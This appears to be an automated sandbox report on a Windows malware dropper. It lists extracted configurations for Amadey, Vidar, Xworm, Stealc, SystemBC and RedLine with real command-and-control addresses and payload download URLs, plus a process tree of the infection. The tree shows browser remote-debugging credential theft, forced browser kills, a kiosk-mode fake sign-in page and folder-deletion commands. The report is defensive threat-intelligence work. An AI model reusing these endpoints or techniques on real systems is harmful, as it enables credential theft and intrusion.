Analysis

  • max time kernel
    148s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    19-02-2025 05:37

General

  • Target

    c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe

  • Size

    2.0MB

  • MD5

    2341120afd619b888c8316c0a91d39b8

  • SHA1

    a20ac1ddd4110ea8a3e7732c8b49ab84df004ce7

  • SHA256

    c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b

  • SHA512

    89cefe006dbd385374fb4feee4b32b944bacee34ae160404ab3516ab12bded8c976699d76290fbc9dd911ba9bfa0c906b944a68d06baad25fc1529cc3a204d0b

  • SSDEEP

    49152:LAHg7O11+U6WgTQv6Rw/HUtUXYeimDSD4ro:sHYO14UuQv6KHzj7E

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

vidar

C2

https://t.me/g02f04

https://steamcommunity.com/profiles/76561199828130190

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

xworm

Version

5.0

C2

45.154.98.175:7000

Mutex

0HzpJoisb4u9PgIO

Attributes
  • Install_directory

    %AppData%

  • install_file

    google_updates.exe

aes.plain

Extracted

Family

stealc

Botnet

default

C2

http://ecozessentials.com

Attributes
  • url_path

    /e6cb1c8fc7cd1659.php

Extracted

Family

systembc

C2

cobolrationumelawrtewarms.co:4001

93.186.202.3:4001

Attributes
  • dns

    5.132.191.104

    ns1.vic.au.dns.opennic.glue

    ns2.vic.au.dns.opennic.glue

Extracted

Family

redline

Botnet

cheat

C2

103.84.89.222:33791

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 16 IoCs
  • Detect Xworm Payload 3 IoCs
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 2 IoCs
  • Sectoprat family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • Systembc family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 25 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 31 IoCs
  • Uses browser remote debugging 2 TTPs 4 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 50 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 49 IoCs
  • Identifies Wine through registry keys 2 TTPs 25 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 9 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 25 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Windows directory 6 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 10 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 20 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 10 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies registry class 2 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 37 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 37 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe
    "C:\Users\Admin\AppData\Local\Temp\c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2392
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2024
      • C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe
        "C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1248
        • C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe
          "C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"
          4⤵
          • Executes dropped EXE
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          PID:2884
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1248 -s 556
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:624
      • C:\Users\Admin\AppData\Local\Temp\1083218001\qFqSpAp.exe
        "C:\Users\Admin\AppData\Local\Temp\1083218001\qFqSpAp.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Modifies system certificate store
        • Suspicious use of WriteProcessMemory
        PID:2312
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 820
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:2420
      • C:\Users\Admin\AppData\Local\Temp\1083537001\m5UP2Yj.exe
        "C:\Users\Admin\AppData\Local\Temp\1083537001\m5UP2Yj.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1532
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1532 -s 896
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:316
      • C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
        "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:880
        • C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
          "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2032
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            5⤵
            • Uses browser remote debugging
            • Enumerates system info in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            PID:1472
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef2439758,0x7fef2439768,0x7fef2439778
              6⤵
                PID:1648
              • C:\Windows\system32\ctfmon.exe
                ctfmon.exe
                6⤵
                  PID:568
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1108 --field-trial-handle=1336,i,4230705843815753071,6531107970150634274,131072 /prefetch:2
                  6⤵
                    PID:820
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1472 --field-trial-handle=1336,i,4230705843815753071,6531107970150634274,131072 /prefetch:8
                    6⤵
                      PID:2872
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1500 --field-trial-handle=1336,i,4230705843815753071,6531107970150634274,131072 /prefetch:8
                      6⤵
                        PID:2104
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2256 --field-trial-handle=1336,i,4230705843815753071,6531107970150634274,131072 /prefetch:1
                        6⤵
                        • Uses browser remote debugging
                        PID:2160
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2264 --field-trial-handle=1336,i,4230705843815753071,6531107970150634274,131072 /prefetch:1
                        6⤵
                        • Uses browser remote debugging
                        PID:3064
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2544 --field-trial-handle=1336,i,4230705843815753071,6531107970150634274,131072 /prefetch:2
                        6⤵
                          PID:824
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1420 --field-trial-handle=1336,i,4230705843815753071,6531107970150634274,131072 /prefetch:1
                          6⤵
                          • Uses browser remote debugging
                          PID:2408
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3336 --field-trial-handle=1336,i,4230705843815753071,6531107970150634274,131072 /prefetch:8
                          6⤵
                            PID:772
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3528 --field-trial-handle=1336,i,4230705843815753071,6531107970150634274,131072 /prefetch:8
                            6⤵
                              PID:2304
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\5xbie" & exit
                            5⤵
                            • System Location Discovery: System Language Discovery
                            PID:1960
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /t 10
                              6⤵
                              • System Location Discovery: System Language Discovery
                              • Delays execution with timeout.exe
                              PID:684
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 880 -s 556
                          4⤵
                          • Loads dropped DLL
                          • Program crash
                          PID:2568
                      • C:\Users\Admin\AppData\Local\Temp\1085139001\C3hYpvm.exe
                        "C:\Users\Admin\AppData\Local\Temp\1085139001\C3hYpvm.exe"
                        3⤵
                        • Drops startup file
                        • Executes dropped EXE
                        • Adds Run key to start application
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of SetWindowsHookEx
                        PID:2292
                      • C:\Users\Admin\AppData\Local\Temp\1086173001\oVpNTUm.exe
                        "C:\Users\Admin\AppData\Local\Temp\1086173001\oVpNTUm.exe"
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Drops file in Windows directory
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2840
                      • C:\Users\Admin\AppData\Local\Temp\1086918001\C3hYpvm.exe
                        "C:\Users\Admin\AppData\Local\Temp\1086918001\C3hYpvm.exe"
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2516
                      • C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe
                        "C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe"
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2312
                      • C:\Users\Admin\AppData\Local\Temp\1086907001\amnew.exe
                        "C:\Users\Admin\AppData\Local\Temp\1086907001\amnew.exe"
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Drops file in Windows directory
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of FindShellTrayWindow
                        PID:680
                        • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                          "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                          4⤵
                          • Downloads MZ/PE file
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Adds Run key to start application
                          • System Location Discovery: System Language Discovery
                          PID:2344
                          • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
                            "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
                            5⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            PID:700
                            • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
                              "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
                              6⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              PID:1788
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 700 -s 560
                              6⤵
                              • Loads dropped DLL
                              • Program crash
                              PID:2232
                          • C:\Users\Admin\AppData\Local\Temp\10008220101\2266dcdb00.exe
                            "C:\Users\Admin\AppData\Local\Temp\10008220101\2266dcdb00.exe"
                            5⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SendNotifyMessage
                            PID:2336
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /F /IM firefox.exe /T
                              6⤵
                              • System Location Discovery: System Language Discovery
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:640
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /F /IM chrome.exe /T
                              6⤵
                              • System Location Discovery: System Language Discovery
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1544
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /F /IM msedge.exe /T
                              6⤵
                              • System Location Discovery: System Language Discovery
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2640
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /F /IM opera.exe /T
                              6⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1844
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /F /IM brave.exe /T
                              6⤵
                              • System Location Discovery: System Language Discovery
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2060
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                              6⤵
                                PID:888
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                  7⤵
                                  • Checks processor information in registry
                                  • Modifies registry class
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of FindShellTrayWindow
                                  • Suspicious use of SendNotifyMessage
                                  PID:1788
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.0.654335574\521194867" -parentBuildID 20221007134813 -prefsHandle 1204 -prefMapHandle 1184 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {63011ce2-7edd-4046-8c7b-8192682cdf22} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 1280 115bae58 gpu
                                    8⤵
                                      PID:2328
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.1.321126141\845584903" -parentBuildID 20221007134813 -prefsHandle 1468 -prefMapHandle 1464 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {39bc8e17-3007-4cf6-bb0b-087e489c5e95} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 1480 f74858 socket
                                      8⤵
                                        PID:744
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.2.1931336929\1753825766" -childID 1 -isForBrowser -prefsHandle 2116 -prefMapHandle 2112 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {54be2a4f-3680-41ac-94af-e62c5121519c} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 2088 18c94958 tab
                                        8⤵
                                          PID:2952
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.3.1914793214\754995230" -childID 2 -isForBrowser -prefsHandle 2584 -prefMapHandle 2580 -prefsLen 26151 -prefMapSize 233444 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2c18bcce-7a1b-4b0e-a758-d77054475fd8} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 2596 1c13cb58 tab
                                          8⤵
                                            PID:3088
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.4.459113487\2144010710" -childID 3 -isForBrowser -prefsHandle 3688 -prefMapHandle 3732 -prefsLen 26356 -prefMapSize 233444 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0a48d57-7657-49c0-8382-a87654b9d198} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 3752 1d97b858 tab
                                            8⤵
                                              PID:4004
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.5.1500790529\560974297" -childID 4 -isForBrowser -prefsHandle 3964 -prefMapHandle 3876 -prefsLen 26356 -prefMapSize 233444 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {50eeeb70-92bf-4bb7-a9aa-ae6ea537a676} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 3976 1f6c4058 tab
                                              8⤵
                                                PID:1508
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.6.1669434005\577791120" -childID 5 -isForBrowser -prefsHandle 4108 -prefMapHandle 4112 -prefsLen 26356 -prefMapSize 233444 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {093260dc-9f8c-41bb-ba42-e535003a7664} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 4092 21890258 tab
                                                8⤵
                                                  PID:2864
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.7.943890621\1793231705" -parentBuildID 20221007134813 -prefsHandle 1280 -prefMapHandle 2316 -prefsLen 26531 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cb00f5a3-1f97-40c7-9af7-c33ab56d8fee} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 1816 f5e458 gpu
                                                  8⤵
                                                    PID:1996
                                            • C:\Users\Admin\AppData\Local\Temp\10008230101\a871065581.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10008230101\a871065581.exe"
                                              5⤵
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • Suspicious use of SetThreadContext
                                              • System Location Discovery: System Language Discovery
                                              PID:2484
                                              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                6⤵
                                                • Downloads MZ/PE file
                                                • System Location Discovery: System Language Discovery
                                                PID:3772
                                        • C:\Users\Admin\AppData\Local\Temp\1086920001\Bjkm5hE.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1086920001\Bjkm5hE.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Suspicious use of SetThreadContext
                                          • System Location Discovery: System Language Discovery
                                          PID:1940
                                          • C:\Users\Admin\AppData\Local\Temp\1086920001\Bjkm5hE.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1086920001\Bjkm5hE.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:1952
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 556
                                            4⤵
                                            • Loads dropped DLL
                                            • Program crash
                                            PID:1892
                                        • C:\Users\Admin\AppData\Local\Temp\1086921001\qFqSpAp.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1086921001\qFqSpAp.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • System Location Discovery: System Language Discovery
                                          PID:2120
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2120 -s 824
                                            4⤵
                                            • Loads dropped DLL
                                            • Program crash
                                            PID:2568
                                        • C:\Users\Admin\AppData\Local\Temp\1086922001\oVpNTUm.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1086922001\oVpNTUm.exe"
                                          3⤵
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                          • Checks BIOS information in registry
                                          • Executes dropped EXE
                                          • Identifies Wine through registry keys
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • Drops file in Windows directory
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:2132
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1086923041\tYliuwV.ps1"
                                          3⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1460
                                        • C:\Users\Admin\AppData\Local\Temp\1086924001\DTQCxXZ.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1086924001\DTQCxXZ.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:2392
                                        • C:\Users\Admin\AppData\Local\Temp\1086925001\7aencsM.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1086925001\7aencsM.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Suspicious use of SetThreadContext
                                          • System Location Discovery: System Language Discovery
                                          PID:2648
                                          • C:\Users\Admin\AppData\Local\Temp\1086925001\7aencsM.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1086925001\7aencsM.exe"
                                            4⤵
                                            • Executes dropped EXE
